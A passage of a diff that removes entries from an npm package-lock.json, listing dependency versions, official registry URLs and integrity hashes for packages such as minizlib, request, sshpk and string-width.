"sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - } - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "optionator": { - "version": "0.9.3", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", - "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", - "dev": true, - "peer": true, - "requires": { - "@aashutoshrathi/word-wrap": "^1.2.3", - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", - "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", - "dev": true, - "peer": true, - "requires": { - "p-limit": "^3.0.2" - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "requires": { - "callsites": "^3.0.0" - } - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - } - } - }, - "path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - }, - "dependencies": { - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - } - } - } - }, - "prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "queue-microtask": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", - "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", - "dev": true, - "peer": true - }, - "react-is": { - "version": "18.3.1", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", - "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "reusify": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", - "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", - "dev": true, - "peer": true - }, - "rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "requires": { - "glob": "^7.1.3" - } - }, - "run-parallel": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", - "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", - "dev": true, - "peer": true, - "requires": { - "queue-microtask": "^1.2.2" - } - }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": 